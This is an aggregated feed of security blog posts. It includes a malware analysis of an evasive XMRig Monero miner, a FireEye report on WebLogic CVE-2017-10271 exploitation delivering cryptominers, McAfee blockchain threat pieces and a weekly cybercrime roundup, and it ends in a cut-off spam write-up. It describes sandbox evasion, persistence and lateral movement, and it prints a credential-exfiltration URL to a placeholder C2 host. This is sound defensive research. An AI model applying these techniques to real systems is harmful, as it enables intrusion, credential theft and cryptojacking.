Although we have been observing a decline in Exploit Kit activity, attackers are not abandoning them altogether. In this blog post, we explored how RIG EK is being used with various exploits to compromise endpoints. We have also shown how the NSIS Loader leverages the lesser known PROPagate process injection technique, possibly in an attempt to evade security products.

FireEye MVX and the FireEye Endpoint Security (HX) platform detect this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Sudeep Singh and Alex Berry for their contributions to this blog post.

Evasive Monero Miners: Deserting the Sandbox for Profit

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

Introduction

It’s not news that the cryptocurrency industry is on the rise. Mining crypto coins offers to anybody a lucrative way to exchange computation resources for profit: every time a miner guesses the solution of a complex mathematical puzzle, he is awarded with a newly minted crypto coin. While some cryptocurrencies are based on puzzles that are efficiently solved by special-purpose devices (such as Bitcoin on ASICs), others are still mined successfully on commodity hardware.

One, in particular, is the Monero (XMR) cryptocurrency. Besides being efficiently mined on standard CPUs and GPUs, it is also anonymous, or fungible to use the precise Monero term. This means that while it is easy to trace transactions between several Bitcoin wallets, a complex system relying on ring signatures ensures that Monero transactions are difficult if not impossible to trace, effectively hiding the origin of a transaction. Because of this, it should come as no surprise that the Monero cryptocurrency is also used for nefarious purposes, often mined by rogue javascripts or binaries downloaded onto and running on an unsuspecting user’s system.

Recent statistics show that 5% of all Monero coins are mined by malware. While the security industry is responding to this cryptojacking phenomenon by introducing new improved detection techniques, developers of these binaries began to replicate the modus operandi of ransomware samples: they started embedding anti-analysis techniques to evade detection as long as possible. In this blog article, we highlight some of our findings when analyzing a variant of the XMRig miner, and share insights about some evasion tricks used to bypass dynamic analysis systems.

Dropper

The sample (sha1: d86c1606094bc9362410a1076e29ac68ae98f972) is an obfuscated .Net application that uses a simple crypter to load an embedded executable at runtime using the Assembly.Load method. The following XOR key is used for its decryption:

50 F5 96 DF F0 61 77 42 39 43 FE 30 81 95 6F AF

Execution is later transferred via the EntryPoint.Invoke method to its entry point, after which another binary resource is decrypted. Figure 1 shows the encryption (AES-256) and the key derivation (PBKDF2) algorithms used to decrypt the binary.

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key

Figure 1. AES decryption routine of the embedded file; note the PBKDF2 key derivation.

The decrypted data consists of yet another executable. We can see it in Figure 2 surrounded by some strings already giving away some of the functionalities included (in particular, note the CheckSandbox and CheckVM strings, most likely indicating routines used to detect whether the sample is run inside an analysis environment).

Figure 2. Decrypted binary blob with an embedded executable file.

Figure 2. Decrypted binary blob with an embedded executable file.

As the reader can imagine, we are always interested in discovering novel evasion techniques. With piqued curiosity, we decided to dive into the code a bit further.

Payload

After peeling off all encryption layers, we finally reached the unpacked payload (see Figure 3). As expected, we found quite a number of anti-analysis techniques.

Figure 3. The unpacked payload

Figure 3. The unpacked payload (sha1: 43f84e789710b06b2ab49b47577caf9d22fd45f8) as found in VT.

The most classic trick (shown in Figure 4) merely checked for known anti-analysis processes. For example, Process Explorer, Process Monitor, etc., are all tools used to better understand which processes are running, how they are spawned, and how much CPU resources are consumed by each executing thread. This is a pretty standard technique to hide from such monitoring tools, and it has been used by other crypto miners as well. As we will see, others were a bit more exotic.

Figure 4. Detecting known process monitoring tools

Figure 4. Detecting known process monitoring tools via GetWindowTextW.

Evasion Technique – Lack of User Input

This technique specifically targets dynamic analysis systems. It tries to detect whether it is executing on a real host by measuring the amount of input received by the operating system. Admittedly, this is not that rare, and we indeed covered it before in a previous article describing some evasion techniques as used by ransomware.

Figure 5. Detecting sandbox by checking the last user input

Figure 5. Detecting sandbox by checking the last user input via GetLastInputInfo.

Figure 5 shows the logic in more details: the code measures the time interval between two subsequent inputs. Anything longer than one minute is considered an indicator that the binary is running inside a sandbox. Note that besides being prone to false positives, this technique can easily be circumvented simulating random user interactions.

Evasion Technique – Multicast IcmpSendEcho

The second anti-analysis technique that we investigated delays the execution via the IcmpCreateFile and IcmpSendEcho APIs. As it is further detailed in Figure 6, they are used to ping a reserved multicast address (224.0.0.0) with a timeout of 30 seconds. Ideally, as no answer is meant to be returned (interestingly enough we have knowledge of some devices erroneously replying to those ICMP packets), the IcmpSendEcho API has the side effect of pausing the executing thread for 30 seconds.

Figure 6. Delaying the execution via IcmpSendEcho API.

Figure 6. Delaying the execution via IcmpSendEcho API.

It’s worth noticing that a similar trick has been previously used by some infected CCleaner samples. In that case, the malicious shellcode was even going a step further by checking if the timeout parameter was being patched in an attempt to accelerate execution (and thus counter the anti-analysis technique).

Conclusions

Any dynamic analysis system wishing to cope with advanced evasive malware must be able to unpack layers of encryption and counter basic anti-analysis techniques. In Figure 7 we can see all the behaviors extracted when fully executing the original sample: the final payload is recognized as a variant of the XMRig Monero CPU Miner, and its network traffic correctly picked up and marked as suspicious.

Figure 7. Lastline analysis of the XMRig CPU miner.

Figure 7. Lastline analysis of the XMRig CPU miner.

Nevertheless it is quite worrying that anti-analysis techniques are becoming this mainstream. So much so that they started to turn into a standard feature of potentially unwanted applications (PUA) as well, including crypto-miners. Hopefully, it is just an isolated case, and not the first of a long series of techniques borrowed from the ransomware world.

Appendix – IOCs

Attached below the reader can find all the hashes related to this analysis, including the mutex identifying this specific strain, and the XMR wallet.

Sha1 (sample): d86c1606094bc9362410a1076e29ac68ae98f972
Sha1 (payload): 43f84e789710b06b2ab49b47577caf9d22fd45f8
Mutex: htTwkXKgtSjskOUmArFBjXWwLccQgxGT
Wallet: 49ptuU9Ktvr6rBkdmrsxdwiSR5WpViAkCXSzcAYWNmXcSZRv37GjwMBNzR7sZE3qBDTnwF9LZNKA8Er2JBiGcKjS6sPaYxY

The post Evasive Monero Miners: Deserting the Sandbox for Profit appeared first on Lastline.

Blockchain 101: What Consumers Need to Know About the Technology

From Bitcoin’s boom, to high stakes hacks – cryptocurrency, and how to secure it, has been the talk of the town. However, what most don’t realize is that a there is a sophisticated technology involved in each cryptocurrency transaction designed to secure digital currency: blockchain technology. Now, many of you may be asking – what exactly is blockchain? Let’s take a look at how this technology actually works and what the security implications may be for consumers.

What is blockchain?

According to the recent McAfee Blockchain Threat Report, “a blockchain is a series of records or transactions, collected together in a block that defines a portion of a ledger. The ledger is distributed among peers, who use it as a trusted authority in which records are valid. Each block in the ledger is linked to its next block, creating a chain—hence the name.” With blockchain, anyone can look at the latest blocks and their “parent” blocks to determine the state of an address. It also assists with multiple issues that can occur when making digital transactions, such as double spending and currency reproduction.

Remaining cautious with blockchain

Blockchain is essentially the secret weapon behind cryptocurrency’s popularity, as it has been positioned as the technology that will help address digital currency’s security issues. While it has great potential, there are some possible risks that could hinder its growth. For instance, the many cryptocurrency hacks we’ve seen recently have proven blockchain is not exactly foolproof. The mechanism involved in blockchain has some vulnerability in itself – which is a friendly reminder that we still need to be cautious in how we view this technology as it relates to security. Remember that blockchain is created by people, who can make mistakes.

Therefore, it’s important we all remain cautious when it comes to treating this technology like the end all be all. So, if you’re considering using blockchain technology to secure your cryptocurrency, be sure to follow these tips:

  • Don’t put all your eggs in one basket. Diversity is king when it comes to cryptocurrency. Since blockchain isn’t a sure-fire way for securing cryptocurrency transactions, make sure you do your research on the various “coins” out there. Select a nice variety of currency types so that if one cryptocurrency is attacked, you’ll still have a few other types to rely on.
  • Always have a plan B. Make sure you have a paper equivalent of records so that all your transactions are not bound by something that is prone to human error. That way, if for some reason something does go wrong with blockchain, you still have your important transactions documented elsewhere.
  • Do your homework. With blockchain and any new and emerging technology really, make sure you always remain a bit skeptical. Do your homework before you embrace the technology – research your options and make sure there’s been no security issues. 

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Blockchain 101: What Consumers Need to Know About the Technology appeared first on McAfee Blogs.

Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19 researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that can lead to remote control over participating nodes. Just four days prior, a mining pool server for the IOT platform HDAC was compromised, impacting the vast majority of miners. In January the largest-ever theft of cryptocurrencies occurred against the exchange Coincheck, resulting in the loss of US$532 million in NEM coin. Due to its increased popularity and profitability cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain. Source: https://bitcoin.org/bitcoin.pdf.

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors include phishing, malware, implementation vulnerabilities, and technology. In a phishing scheme in January, Iota cryptocurrency lost $4 million to scams that lasted several months. Malware authors often change their focus. In late 2017 to early 2018 some have migrated from deploying ransomware to cryptomining. They have been found using open-source code such as XMRig for system-based mining and the mining service Coinhive.

Source: McAfee Labs

Implementation vulnerabilities are the flaws introduced when new technologies and tools are built on top of blockchain. The recent EOS attack is one example. In mid-July 2017 Iota suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found with numerous vulnerabilities. Attackers exploiting the vulnerabilities were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much more difficult to implement, although they are not unheard of. The most widely known attack is the 51% attack, or majority attack, which enables attackers to create their own chains at will. The group 51 Crew targeted small coins, including Krypton, and held them for ransom. Another attack, known as a Sybil attack, can allow an attacker to completely control a targeted victim’s ledger. Attempts have been made for larger scale Sybil attacks such as one in 2016. 

Dictionary Attacks

Blockchain may be a relatively new technology but that does not mean that old attacks cannot work. Mostly due to insecure user behavior, dictionary attacks can leverage some implementations of blockchain. Brain wallets, or wallets based on weak passwords, are insecure, yet people still use them. These wallets are routinely stolen, as was the case with the nearly BTC60 stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes. Source: https://blockchain.info.

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. Cryptocurrency exchanges can be thought of as banks in which you users create accounts, manage finances, and even trade currencies including traditional ones. One of the most notable incidents is the attack against Mt. Gox between 2011‒2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, previously mentioned, survived the attack and began reimbursing victims for their losses in March 2018. Not all recent exchanges fared so well. Bitcurex abruptly closed and led to an official investigation into the circumstances; Youbit suffered two attacks, leading the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.

Conclusion 

Blockchain technologies and its users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining

Introduction

FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().


Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).


Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers


Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence


Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers


Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers


Figure 6: Terminating processes directly


Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key


Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion


Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.


Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers


Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware


Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence


Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage


Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.

Conclusion

Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

POWERSHELL DOWNLOADER (METHODOLOGY)

MONERO MINER (METHODOLOGY)

MIMIKATZ (CREDENTIAL STEALER)

Indicators of Compromise

MD5

Name

3421A769308D39D4E9C7E8CAECAF7FC4

cranberry.exe/logic.exe

B3A831BFA590274902C77B6C7D4C31AE

xmrig.exe/yam.exe

26404FEDE71F3F713175A3A3CEBC619B

1.ps1

D3D10FAA69A10AC754E3B7DDE9178C22

2.ps1

9C91B5CF6ECED54ABB82D1050C5893F2

info3.ps1

3AAD3FABF29F9DF65DCBD0F308FF0FA8

info6.ps1

933633F2ACFC5909C83F5C73B6FC97CC

lower.css

B47DAF937897043745DF81F32B9D7565

lib.css

3542AC729035C0F3DB186DDF2178B6A0

bootstrap.css

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

2018-02-10_ITT.pngFor starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


2018-02-10_ITTGroups

Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.

2018-02-10_ITTNew

Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresA federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.

 

Swisscoin [SIC] cryptocurrency spam

Swisscoin is a fairly low-volume self-styled cryptocurrency that has been the target of a Necurs-based spam run starting on Saturday 13th January, and increasing in volume to huge levels on Monday. From:    Florine Fray [Fray.419@redacted.tld] Date:    15 January 2018 at 10:51 Subject:    Could this digital currency actually make you a millionaire? Every once in a while, an opportunity comes